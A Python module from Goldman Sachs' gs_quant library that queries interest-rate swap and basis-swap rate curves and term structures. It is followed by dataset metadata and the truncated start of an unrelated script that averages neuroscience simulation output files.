""" Copyright 2020 Goldman Sachs. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import logging import re from typing import Optional import datetime import pandas as pd from pandas import Series from gs_quant.api.gs.assets import GsAssetApi from gs_quant.api.gs.data import QueryType, GsDataApi from gs_quant.data import DataContext from gs_quant.errors import MqValueError from gs_quant.datetime.gscalendar import GsCalendar from gs_quant.markets.securities import AssetIdentifier, Asset from gs_quant.target.common import Currency as CurrencyEnum, PricingLocation, AssetClass, AssetType, FieldFilterMap from gs_quant.timeseries import ASSET_SPEC, BenchmarkType, plot_measure, MeasureDependency, GENERIC_DATE from gs_quant.timeseries.helper import _to_offset from gs_quant.timeseries.measures import _asset_from_spec, _market_data_timed, _range_from_pricing_date, \ _get_custom_bd _logger = logging.getLogger(__name__) CURRENCY_TO_SWAP_RATE_BENCHMARK = { 'CHF': {'LIBOR': 'CHF-LIBOR-BBA', 'SARON': 'CHF-SARON-OIS-COMPOUND'}, 'EUR': {'EURIBOR': 'EUR-EURIBOR-Telerate', 'EONIA': 'EUR-EONIA-OIS-COMPOUND'}, 'GBP': {'LIBOR': 'GBP-LIBOR-BBA', 'SONIA': 'GBP-SONIA-COMPOUND'}, 'JPY': {'LIBOR': 'JPY-LIBOR-BBA', 'TONA': 'JPY-TONA-OIS-COMPOUND'}, 'SEK': {'STIBOR': 'SEK-STIBOR-SIDE'}, 'USD': {'LIBOR': 'USD-LIBOR-BBA', 'Fed_Funds': 'USD-Federal Funds-H.15-OIS-COMP', 'SOFR': 'USD-SOFR-COMPOUND'} } BENCHMARK_TO_DEFAULT_FLOATING_RATE_TENORS = { 'CHF-LIBOR-BBA': '6m', 'CHF-SARON-OIS-COMPOUND': '1y', 'EUR-EURIBOR-Telerate': '6m', 
'EUR-EONIA-OIS-COMPOUND': '1y', 'GBP-LIBOR-BBA': '6m', 'GBP-SONIA-COMPOUND': '1y', 'JPY-LIBOR-BBA': '6m', 'JPY-TONA-OIS-COMPOUND': '1y', 'SEK-STIBOR-SIDE': '6m', 'USD-LIBOR-BBA': '3m', 'USD-Federal Funds-H.15-OIS-COMP': '1y', 'USD-SOFR-COMPOUND': '1y' } def _currency_to_mdapi_swap_rate_asset(asset_spec: ASSET_SPEC) -> str: asset = _asset_from_spec(asset_spec) bbid = asset.get_identifier(AssetIdentifier.BLOOMBERG_ID) # for each currency, get a dummy asset for checking availability if bbid == 'CHF': result = 'MAW25BGQJH9P6DPT' elif bbid == 'EUR': result = 'MAA9MVX15AJNQCVG' elif bbid == 'GBP': result = 'MA6QCAP9B7ABS9HA' elif bbid == 'JPY': result = 'MAEE219J5ZP0ZKRK' elif bbid == 'SEK': result = 'MAETMVTPNP3199A5' elif bbid == 'USD': result = 'MAFRSWPAF5QPNTP2' else: return asset.get_marquee_id() return result def _currency_to_mdapi_basis_swap_rate_asset(asset_spec: ASSET_SPEC) -> str: asset = _asset_from_spec(asset_spec) bbid = asset.get_identifier(AssetIdentifier.BLOOMBERG_ID) # for each currency, get a dummy asset for checking availability if bbid == 'EUR': result = 'MAGRG2VT11GQ2RQ9' elif bbid == 'GBP': result = 'MAHCYNB3V75JC5Q8' elif bbid == 'JPY': result = 'MAXVRBEZCJVH0C4V' elif bbid == 'USD': result = 'MAQB1PGEJFCET3GG' else: return asset.get_marquee_id() return result def _convert_asset_for_mdapi_swap_rates(**kwargs) -> str: assets = GsAssetApi.get_many_assets(**kwargs) if len(assets) > 1: raise MqValueError('Specified arguments match multiple assets') elif len(assets) == 0: raise MqValueError('Specified arguments did not match any asset in the dataset') else: return assets[0].id def check_forward_tenor(forward_tenor) -> GENERIC_DATE: if isinstance(forward_tenor, datetime.date): return forward_tenor elif forward_tenor is None or forward_tenor == 'Spot': return '0b' elif not (re.fullmatch('(\\d+)([bdwmy])', forward_tenor) or re.fullmatch('(imm[1-4]|frb[1-9])', forward_tenor)): raise MqValueError('invalid forward tenor ' + forward_tenor) else: return 
forward_tenor def _check_benchmark_type(currency, benchmark_type): if benchmark_type is not None and \ benchmark_type.value not in CURRENCY_TO_SWAP_RATE_BENCHMARK[currency.value].keys(): raise MqValueError('%s is not supported for %s', benchmark_type, currency.value) def _get_swap_leg_defaults(currency: CurrencyEnum, benchmark_type: BenchmarkType = None, floating_rate_tenor: str = None) -> dict: if currency == CurrencyEnum.JPY: pricing_location = PricingLocation.TKO elif currency == CurrencyEnum.USD: pricing_location = PricingLocation.NYC else: pricing_location = PricingLocation.LDN # default benchmark types if benchmark_type is None: if currency == CurrencyEnum.EUR: benchmark_type = BenchmarkType.EURIBOR elif currency == CurrencyEnum.SEK: benchmark_type = BenchmarkType.STIBOR else: benchmark_type = BenchmarkType.LIBOR benchmark_type_input = CURRENCY_TO_SWAP_RATE_BENCHMARK[currency.value][benchmark_type.value] # default floating index if floating_rate_tenor is None: floating_rate_tenor = BENCHMARK_TO_DEFAULT_FLOATING_RATE_TENORS[benchmark_type_input] return dict(currency=currency, benchmark_type=benchmark_type_input, floating_rate_tenor=floating_rate_tenor, pricing_location=pricing_location) @plot_measure((AssetClass.Cash,), (AssetType.Currency,), [MeasureDependency(id_provider=_currency_to_mdapi_swap_rate_asset, query_type=QueryType.SWAP_RATE)]) def swap_rate_2(asset: Asset, swap_tenor: str, benchmark_type: BenchmarkType = None, floating_rate_tenor: str = None, forward_tenor: Optional[GENERIC_DATE] = None, *, source: str = None, real_time: bool = False) -> Series: """ GS end-of-day Fixed-Floating interest rate swap (IRS) curves across major currencies. :param asset: asset object loaded from security master :param swap_tenor: relative date representation of expiration date e.g. 1m :param benchmark_type: benchmark type e.g. 
LIBOR :param floating_rate_tenor: floating index rate :param forward_tenor: absolute / relative date representation of forward starting point eg: '1y' or 'Spot' for spot starting swaps, 'imm1' or 'frb1' :param source: name of function caller :param real_time: whether to retrieve intraday data instead of EOD :return: swap rate curve """ if real_time: raise NotImplementedError('realtime swap_rate not implemented') currency = CurrencyEnum(asset.get_identifier(AssetIdentifier.BLOOMBERG_ID)) if currency.value not in ['JPY', 'EUR', 'USD', 'GBP', 'CHF', 'SEK']: raise NotImplementedError('Data not available for {} swap rates'.format(currency.value)) _check_benchmark_type(currency, benchmark_type) defaults = _get_swap_leg_defaults(currency, benchmark_type, floating_rate_tenor) if not (re.fullmatch('(\\d+)([bdwmy])', swap_tenor) or re.fullmatch('(frb[1-9])', forward_tenor)): raise MqValueError('invalid swap tenor ' + swap_tenor) if not re.fullmatch('(\\d+)([bdwmy])', defaults['floating_rate_tenor']): raise MqValueError('invalid floating rate tenor ' + defaults['floating_rate_tenor'] + ' for index: ' + defaults['benchmark_type']) forward_tenor = check_forward_tenor(forward_tenor) clearing_house = 'LCH' csaTerms = currency.value + '-1' fixed_rate = 'ATM' kwargs = dict(type='Swap', asset_parameters_termination_date=swap_tenor, asset_parameters_floating_rate_option=defaults['benchmark_type'], asset_parameters_fixed_rate=fixed_rate, asset_parameters_clearing_house=clearing_house, asset_parameters_floating_rate_designated_maturity=defaults['floating_rate_tenor'], asset_parameters_effective_date=forward_tenor, asset_parameters_notional_currency=currency.name, pricing_location=defaults['pricing_location'].value) rate_mqid = _convert_asset_for_mdapi_swap_rates(**kwargs) _logger.debug('where asset= %s, swap_tenor=%s, benchmark_type=%s, floating_rate_tenor=%s, forward_tenor=%s, ' 'pricing_location=%s', rate_mqid, swap_tenor, defaults['benchmark_type'], defaults['floating_rate_tenor'], 
forward_tenor, defaults['pricing_location'].value) where = FieldFilterMap(csaTerms=csaTerms) q = GsDataApi.build_market_data_query([rate_mqid], QueryType.SWAP_RATE, where=where, source=source, real_time=real_time) _logger.debug('q %s', q) df = _market_data_timed(q) return Series() if df.empty else df['swapRate'] @plot_measure((AssetClass.Cash,), (AssetType.Currency,), [MeasureDependency(id_provider=_currency_to_mdapi_basis_swap_rate_asset, query_type=QueryType.BASIS_SWAP_RATE)]) def basis_swap_spread(asset: Asset, swap_tenor: str = '1y', spread_benchmark_type: BenchmarkType = None, spread_tenor: str = None, reference_benchmark_type: BenchmarkType = None, reference_tenor: str = None, forward_tenor: Optional[GENERIC_DATE] = None, *, source: str = None, real_time: bool = False, ) -> Series: """ GS end-of-day Floating-Floating interest rate swap (IRS) curves across major currencies. :param asset: asset object loaded from security master :param swap_tenor: relative date representation of expiration date e.g. 1m :param spread_benchmark_type: benchmark type of spread leg on which basis spread is added e.g. LIBOR :param spread_tenor: relative date representation of expiration date of paying leg e.g. 1m :param reference_benchmark_type: benchmark type of reference leg e.g. LIBOR :param reference_tenor: relative date representation of expiration date of reference leg e.g. 
1m :param forward_tenor: absolute / relative date representation of forward starting point eg: '1y' or 'Spot' for spot starting swaps, 'imm1' or 'frb1' :param source: name of function caller :param real_time: whether to retrieve intraday data instead of EOD :return: swap rate curve """ if real_time: raise NotImplementedError('realtime basis_swap_rate not implemented') currency = CurrencyEnum(asset.get_identifier(AssetIdentifier.BLOOMBERG_ID)) if currency.value not in ['JPY', 'EUR', 'USD', 'GBP']: raise NotImplementedError('Data not available for {} basis swap rates'.format(currency.value)) for benchmark_type in [spread_benchmark_type, reference_benchmark_type]: _check_benchmark_type(currency, benchmark_type) if not (re.fullmatch('(\\d+)([bdwmy])', swap_tenor) or re.fullmatch('(frb[1-9])', forward_tenor)): raise MqValueError('invalid swap tenor ' + swap_tenor) # default benchmark types legs_w_defaults = dict() legs_w_defaults['spread'] = _get_swap_leg_defaults(currency, spread_benchmark_type, spread_tenor) legs_w_defaults['reference'] = _get_swap_leg_defaults(currency, reference_benchmark_type, reference_tenor) for key, leg in legs_w_defaults.items(): if not re.fullmatch('(\\d+)([bdwmy])', leg['floating_rate_tenor']): raise MqValueError('invalid floating rate tenor ' + leg['floating_rate_tenor'] + ' index: ' + leg['benchmark_type']) forward_tenor = check_forward_tenor(forward_tenor) csaTerms = currency.value + '-1' clearing_house = 'LCH' kwargs = dict(type='BasisSwap', asset_parameters_termination_date=swap_tenor, asset_parameters_payer_rate_option=legs_w_defaults['spread']['benchmark_type'], asset_parameters_payer_designated_maturity=legs_w_defaults['spread']['floating_rate_tenor'], asset_parameters_receiver_rate_option=legs_w_defaults['reference']['benchmark_type'], asset_parameters_receiver_designated_maturity=legs_w_defaults['reference']['floating_rate_tenor'], asset_parameters_clearing_house=clearing_house, asset_parameters_effective_date=forward_tenor, 
asset_parameters_notional_currency=currency.name, pricing_location=legs_w_defaults['spread']['pricing_location'].value) rate_mqid = _convert_asset_for_mdapi_swap_rates(**kwargs) _logger.debug('where asset=%s, swap_tenor=%s, spread_benchmark_type=%s, spread_tenor=%s, ' 'reference_benchmark_type=%s, reference_tenor=%s, forward_tenor=%s, pricing_location=%s ', rate_mqid, swap_tenor, legs_w_defaults['spread']['benchmark_type'], legs_w_defaults['spread']['floating_rate_tenor'], legs_w_defaults['reference']['benchmark_type'], legs_w_defaults['reference']['floating_rate_tenor'], forward_tenor, legs_w_defaults['spread']['pricing_location'].value) where = FieldFilterMap(csaTerms=csaTerms) q = GsDataApi.build_market_data_query([rate_mqid], QueryType.BASIS_SWAP_RATE, where=where, source=source, real_time=real_time) _logger.debug('q %s', q) df = _market_data_timed(q) return Series() if df.empty else df['basisSwapRate'] @plot_measure((AssetClass.Cash,), (AssetType.Currency,), [MeasureDependency(id_provider=_currency_to_mdapi_swap_rate_asset, query_type=QueryType.SWAP_RATE)]) def swap_term_structure(asset: Asset, benchmark_type: BenchmarkType = None, floating_rate_tenor: str = None, forward_tenor: Optional[GENERIC_DATE] = None, pricing_date: Optional[GENERIC_DATE] = None, *, source: str = None, real_time: bool = False) -> Series: """ GS end-of-day Fixed-Floating interest rate swap (IRS) term structure across major currencies. :param asset: asset object loaded from security master :param benchmark_type: benchmark type e.g. 
LIBOR :param floating_rate_tenor: floating index rate :param forward_tenor: absolute / relative date representation of forward starting point eg: '1y' or 'Spot' for spot starting swaps, 'imm1' or 'frb1' :param pricing_date: YYYY-MM-DD or relative date :param source: name of function caller :param real_time: whether to retrieve intraday data instead of EOD :return: swap rate term structure """ if real_time: raise NotImplementedError('realtime swap_rate not implemented') currency = asset.get_identifier(AssetIdentifier.BLOOMBERG_ID) currency = CurrencyEnum(currency) if currency.value not in ['JPY', 'EUR', 'USD', 'GBP', 'CHF', 'SEK']: raise NotImplementedError('Data not available for {} swap rates'.format(currency.value)) clearing_house = 'LCH' _check_benchmark_type(currency, benchmark_type) forward_tenor = check_forward_tenor(forward_tenor) defaults = _get_swap_leg_defaults(currency, benchmark_type, floating_rate_tenor) if not re.fullmatch('(\\d+)([bdwmy])', defaults['floating_rate_tenor']): raise MqValueError('invalid floating rate tenor ' + defaults['floating_rate_tenor'] + ' for index: ' + defaults['benchmark_type']) calendar = defaults['pricing_location'].value if pricing_date is not None and pricing_date in list(GsCalendar.get(calendar).holidays): raise MqValueError('Specified pricing date is a holiday in {} calendar'.format(calendar)) csaTerms = currency.value + '-1' fixed_rate = 'ATM' kwargs = dict(type='Swap', asset_parameters_floating_rate_option=defaults['benchmark_type'], asset_parameters_fixed_rate=fixed_rate, asset_parameters_clearing_house=clearing_house, asset_parameters_floating_rate_designated_maturity=defaults['floating_rate_tenor'], asset_parameters_effective_date=forward_tenor, asset_parameters_notional_currency=currency.name, pricing_location=defaults['pricing_location'].value) assets = GsAssetApi.get_many_assets(**kwargs) if len(assets) == 0: raise MqValueError('Specified arguments did not match any asset in the dataset') else: rate_mqids = 
[asset.id for asset in assets] asset_string = '' for mqid in rate_mqids: asset_string = asset_string + ',' + mqid _logger.debug('assets returned %s', asset_string) _logger.debug('where benchmark_type=%s, floating_rate_tenor=%s, forward_tenor=%s, ' 'pricing_location=%s', defaults['benchmark_type'], defaults['floating_rate_tenor'], forward_tenor, defaults['pricing_location'].value) start, end = _range_from_pricing_date(calendar, pricing_date) with DataContext(start, end): where = FieldFilterMap(csaTerms=csaTerms) q = GsDataApi.build_market_data_query(rate_mqids, QueryType.SWAP_RATE, where=where, source=source, real_time=real_time) _logger.debug('q %s', q) df = _market_data_timed(q) if df.empty: return pd.Series() latest = df.index.max() _logger.info('selected pricing date %s', latest) df = df.loc[latest] business_day = _get_custom_bd(calendar) df = df.assign(expirationDate=df.index + df['terminationTenor'].map(_to_offset) + business_day - business_day) df = df.set_index('expirationDate') df.sort_index(inplace=True) df = df.loc[DataContext.current.start_date: DataContext.current.end_date] return df['swapRate'] if not df.empty else pd.Series() @plot_measure((AssetClass.Cash,), (AssetType.Currency,), [MeasureDependency(id_provider=_currency_to_mdapi_basis_swap_rate_asset, query_type=QueryType.BASIS_SWAP_RATE)]) def basis_swap_term_structure(asset: Asset, spread_benchmark_type: BenchmarkType = None, spread_tenor: str = None, reference_benchmark_type: BenchmarkType = None, reference_tenor: str = None, forward_tenor: Optional[GENERIC_DATE] = None, pricing_date: Optional[GENERIC_DATE] = None, *, source: str = None, real_time: bool = False, ) -> Series: """ GS end-of-day Floating-Floating interest rate swap (IRS) term structure across major currencies. :param asset: asset object loaded from security master :param spread_benchmark_type: benchmark type of spread leg on which basis spread is added e.g. 
LIBOR :param spread_tenor: relative date representation of expiration date of spread leg e.g. 1m :param reference_benchmark_type: benchmark type of reference leg e.g. LIBOR :param reference_tenor: relative date representation of expiration date of reference leg e.g. 1m :param forward_tenor: absolute / relative date representation of forward starting point eg: '1y' or 'Spot' for spot starting swaps, 'imm1' or 'frb1' :param pricing_date: YYYY-MM-DD or relative date :param source: name of function caller :param real_time: whether to retrieve intraday data instead of EOD :return: swap rate curve """ if real_time: raise NotImplementedError('realtime basis_swap_rate not implemented') currency = CurrencyEnum(asset.get_identifier(AssetIdentifier.BLOOMBERG_ID)) if currency.value not in ['JPY', 'EUR', 'USD', 'GBP']: raise NotImplementedError('Data not available for {} basis swap rates'.format(currency.value)) for benchmark_type in [spread_benchmark_type, reference_benchmark_type]: _check_benchmark_type(currency, benchmark_type) # default benchmark types legs_w_defaults = dict() legs_w_defaults['spread'] = _get_swap_leg_defaults(currency, spread_benchmark_type, spread_tenor) legs_w_defaults['reference'] = _get_swap_leg_defaults(currency, reference_benchmark_type, reference_tenor) for key, leg in legs_w_defaults.items(): if not re.fullmatch('(\\d+)([bdwmy])', leg['floating_rate_tenor']): raise MqValueError('invalid floating rate tenor ' + leg['floating_rate_tenor'] + ' index: ' + leg['benchmark_type']) forward_tenor = check_forward_tenor(forward_tenor) calendar = legs_w_defaults['spread']['pricing_location'].value if pricing_date is not None and pricing_date in list(GsCalendar.get(calendar).holidays): raise MqValueError('Specified pricing date is a holiday in {} calendar'.format(calendar)) csaTerms = currency.value + '-1' clearing_house = 'LCH' kwargs = dict(type='BasisSwap', asset_parameters_payer_rate_option=legs_w_defaults['spread']['benchmark_type'], 
asset_parameters_payer_designated_maturity=legs_w_defaults['spread']['floating_rate_tenor'], asset_parameters_receiver_rate_option=legs_w_defaults['reference']['benchmark_type'], asset_parameters_receiver_designated_maturity=legs_w_defaults['reference']['floating_rate_tenor'], asset_parameters_clearing_house=clearing_house, asset_parameters_effective_date=forward_tenor, asset_parameters_notional_currency=currency.name, pricing_location=legs_w_defaults['spread']['pricing_location'].value) assets = GsAssetApi.get_many_assets(**kwargs) if len(assets) == 0: raise MqValueError('Specified arguments did not match any asset in the dataset') else: rate_mqids = [asset.id for asset in assets] asset_string = '' for mqid in rate_mqids: asset_string = asset_string + ',' + mqid _logger.debug('assets returned %s', asset_string) _logger.debug('where spread_benchmark_type=%s, spread_tenor=%s, reference_benchmark_type=%s, ' 'reference_tenor=%s, forward_tenor=%s, pricing_location=%s ', legs_w_defaults['spread']['benchmark_type'], legs_w_defaults['spread']['floating_rate_tenor'], legs_w_defaults['reference']['benchmark_type'], legs_w_defaults['reference']['floating_rate_tenor'], forward_tenor, legs_w_defaults['spread']['pricing_location'].value) start, end = _range_from_pricing_date(calendar, pricing_date) with DataContext(start, end): where = FieldFilterMap(csaTerms=csaTerms) q = GsDataApi.build_market_data_query(rate_mqids, QueryType.BASIS_SWAP_RATE, where=where, source=source, real_time=real_time) _logger.debug('q %s', q) df = _market_data_timed(q) if df.empty: return pd.Series() latest = df.index.max() _logger.info('selected pricing date %s', latest) df = df.loc[latest] business_day = _get_custom_bd(calendar) df = df.assign(expirationDate=df.index + df['terminationTenor'].map(_to_offset) + business_day - business_day) df = df.set_index('expirationDate') df.sort_index(inplace=True) df = df.loc[DataContext.current.start_date: DataContext.current.end_date] return df['basisSwapRate'] 
if not df.empty else pd.Series()
49.398323
120
0.699444
2,920
23,563
5.378082
0.113356
0.062086
0.040053
0.018148
0.808456
0.794193
0.781712
0.763054
0.757387
0.73962
0
0.005254
0.200272
23,563
476
121
49.502101
0.828115
0.155668
0
0.591331
0
0.003096
0.177907
0.014342
0
0
0
0
0
1
0.03096
false
0
0.049536
0
0.126935
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
899fd6e02e132125d48ba53f37d7d830846cebde
22
py
Python
gblint/__init__.py
avoceteditors/gblint
7935e58a1e744931fd70170fe0db3d9664b8a9a5
[ "BSD-3-Clause" ]
1
2020-08-10T18:54:51.000Z
2020-08-10T18:54:51.000Z
gblint/__init__.py
avoceteditors/gblint
7935e58a1e744931fd70170fe0db3d9664b8a9a5
[ "BSD-3-Clause" ]
null
null
null
gblint/__init__.py
avoceteditors/gblint
7935e58a1e744931fd70170fe0db3d9664b8a9a5
[ "BSD-3-Clause" ]
null
null
null
from .core import run
11
21
0.772727
4
22
4.25
1
0
0
0
0
0
0
0
0
0
0
0
0.181818
22
1
22
22
0.944444
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
98363093fca20b74b1c9711df2c6a9342585c0ff
17,994
py
Python
simulation-bin/run_binary_paper2/priming_and_activation/averageFileColumnsAdvancedMod.py
jlubo/memory-consolidation-stc
f9934760e12de324360297d7fc7902623169cb4d
[ "Apache-2.0" ]
2
2021-03-02T21:46:56.000Z
2021-06-30T03:12:07.000Z
simulation-bin/run_binary_paper2/priming_and_activation/averageFileColumnsAdvancedMod.py
jlubo/memory-consolidation-stc
f9934760e12de324360297d7fc7902623169cb4d
[ "Apache-2.0" ]
null
null
null
simulation-bin/run_binary_paper2/priming_and_activation/averageFileColumnsAdvancedMod.py
jlubo/memory-consolidation-stc
f9934760e12de324360297d7fc7902623169cb4d
[ "Apache-2.0" ]
3
2021-03-22T12:56:52.000Z
2021-09-13T07:42:36.000Z
############################################################################################## ### Script to average data from the same columns in data files stored in different folders ### ############################################################################################## ### Copyright 2017-2021 Jannik Luboeinski ### licensed under Apache-2.0 (http://www.apache.org/licenses/LICENSE-2.0) import numpy as np import os from pathlib import Path from mergeRawData import * # averageFileColumns # Averages specified data columns across data files located in directories which names contain a specific string # and computes the standard deviation # outname: name of the file to write the averaged data to # rootpath: path in which to look for data folders # protocol: string that the data folders have to contain # suffix: suffix in the filename of data files to be read # columns: list of numbers of the columns in the data file to be read and averaged (e.g., [1, 3] for first and third column) # first_column_par [optional]: indicates if first column is to be treated as parameter (e.g., time) - it is then added regardless of 'columns' # comment_line [optional]: if True, leaves out the first line def averageFileColumns(outname, rootpath, protocol, suffix, columns, first_column_par=True, comment_line=False): print("Averaging columns " + str(columns) + " from files matching '*" + suffix + "' in folders of the protocol '" + protocol + "'...") sample_number = 0 col_sep = '= ' #'\t\t' character(s) separating the columns # find the folders with the protocol in their name rawpaths = Path(rootpath) paths = np.array([str(x) for x in rawpaths.iterdir() if x.is_dir() and protocol in str(x)]) if paths.size == 0: raise FileNotFoundError("No folders found that contain the string '" + protocol + "' in their name.") print("According folders found:\n", paths) # read data and average # loop over directories for i in range(paths.size): # find the files with the suffix in their name 
subrawpaths = Path(paths[i]) subpaths = np.array([str(x) for x in subrawpaths.iterdir() if str(x).find(suffix) >= len(str(x))-len(suffix)]) if subpaths.size == 0: raise FileNotFoundError("No files found matching '*" + suffix + "' in '" + paths[i] + "'.") print("According files found in '" + paths[i] + "':\n", subpaths) sample_number += subpaths.size # loop over files in each directory for j in range(subpaths.size): with open(subpaths[j]) as f: rawdata = f.read() rawdata = rawdata.split('\n') if comment_line: del rawdata[0] # leave out comment line if rawdata[-1] == "": del rawdata[-1] # delete empty line if i == 0 and j == 0: # first file found: read number of rows and create data arrays num_rows = len(rawdata) num_cols = len(columns) time = np.zeros(num_rows) data = np.zeros((num_rows, num_cols)) data_var = np.zeros((num_rows, num_cols)) elif num_rows != len(rawdata): raise IndexError("In '" + subpaths[j] + "': wrong number of rows: " + str(len(rawdata)-1) + " (" + str(num_rows) + " expected).") for k in range(num_rows): values = rawdata[k].split(col_sep) if len(values) < 2: values = [np.nan,np.nan] # to avoid problems reading descriptions try: time[k] += np.double(values[0]) # read first/parameter column except ValueError: pass#print("Computing mean: conversion error in line " + str(k+1) + ", column 1\n\tin '" + subpaths[j] + "'.") for l in range(num_cols): try: data[k][l] += np.double(values[columns[l]-1]) # read data columns except ValueError: pass#print("Computing mean: conversion error in line " + str(k+1) + ", column " + str(columns[l]) + "\n\tin '" + subpaths[j] + "'.") f.close() time = time / sample_number data = data / sample_number # read data and compute variance # loop over directories for i in range(paths.size): # loop over files in each directory for j in range(subpaths.size): with open(subpaths[j]) as f: rawdata = f.read() rawdata = rawdata.split('\n') if comment_line: del rawdata[0] # leave out comment line if rawdata[-1] == "": del rawdata[-1] # 
delete empty line for k in range(num_rows): values = rawdata[k].split(col_sep) #if len(values) < 2: # values = [np.nan,np.nan] # to avoid problems reading descriptions for l in range(num_cols): try: data_var[k][l] += np.power(np.double(values[columns[l]-1])-data[k][l], 2) # read data columns except: pass#print("Computing variance: conversion error in line " + str(k+1) + ", column " + str(columns[l]) + "\n\tin '" + subpaths[j] + "'.") #except IndexError: # print("INDEX ERROR") f.close() data_stdev = np.sqrt(data_var / (sample_number - 1)) # write averaged data fout = open(outname + '.txt', 'w') for k in range(num_rows): ## ADAPTED if k >=4 and k <=7: # only need those four rows! for l in range(num_cols): fout.write(str(data[k][l]) + "\t" + str(data_stdev[k][l])) if (k+1) % 4 == 0 and l >= num_cols-1: # after the last column and after 4 rows have been clutched together fout.write("\n") else: # as long as last column is not yet reached fout.write("\t") fout.close() f = open("p_act_summary_temp_0names.txt", "w") f.write("NOOVERLAP, A primed\n") f.write("NOOVERLAP, B primed\n") f.write("NOOVERLAP, C primed\n") f.write("OVERLAP10, A primed\n") f.write("OVERLAP10, B primed\n") f.write("OVERLAP10, C primed\n") f.write("OVERLAP10 no AC, no ABC, A primed\n") f.write("OVERLAP10 no AC, no ABC, B primed\n") f.write("OVERLAP10 no AC, no ABC, C primed\n") f.write("OVERLAP10 no BC, no ABC, A primed\n") f.write("OVERLAP10 no BC, no ABC, B primed\n") f.write("OVERLAP10 no BC, no ABC, C primed\n") f.close() # 10 min averageFileColumns("p_act_averaged_Aprimed", "2. Switching after 10 min/NOOVERLAP/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "2. Switching after 10 min/NOOVERLAP/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "2. 
Switching after 10 min/NOOVERLAP/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_10min_NOOVERLAP.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "2. Switching after 10 min/OVERLAP10/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "2. Switching after 10 min/OVERLAP10/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "2. Switching after 10 min/OVERLAP10/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_10min_OVERLAP10.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "2. Switching after 10 min/OVERLAP10 no AC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "2. Switching after 10 min/OVERLAP10 no AC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "2. Switching after 10 min/OVERLAP10 no AC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_10min_OVERLAP10_noAC_noABC.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "2. Switching after 10 min/OVERLAP10 no BC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "2. Switching after 10 min/OVERLAP10 no BC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "2. 
Switching after 10 min/OVERLAP10 no BC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_10min_OVERLAP10_noBC_noABC.txt", remove_raw=True, sep_str='\n') os.system('cat "p_act_10min_NOOVERLAP.txt" > "p_act_summary_temp_10min.txt"') os.system('cat "p_act_10min_OVERLAP10.txt" >> "p_act_summary_temp_10min.txt"') os.system('cat "p_act_10min_OVERLAP10_noAC_noABC.txt" >> "p_act_summary_temp_10min.txt"') os.system('cat "p_act_10min_OVERLAP10_noBC_noABC.txt" >> "p_act_summary_temp_10min.txt"') os.system('rm -R -f "p_act_10min"*') mergeRawData(".", "p_act_summary_temp_", "p_act_summary_10min.txt", remove_raw=False, sep_str='\t') # remove_raw=False to keep _temp_0names file os.system('rm -f p_act_summary_temp_10min.txt') # 1 h averageFileColumns("p_act_averaged_Aprimed", "3. Switching after 1 h/NOOVERLAP/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "3. Switching after 1 h/NOOVERLAP/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "3. Switching after 1 h/NOOVERLAP/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_1h_NOOVERLAP.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "3. Switching after 1 h/OVERLAP10/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "3. Switching after 1 h/OVERLAP10/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "3. 
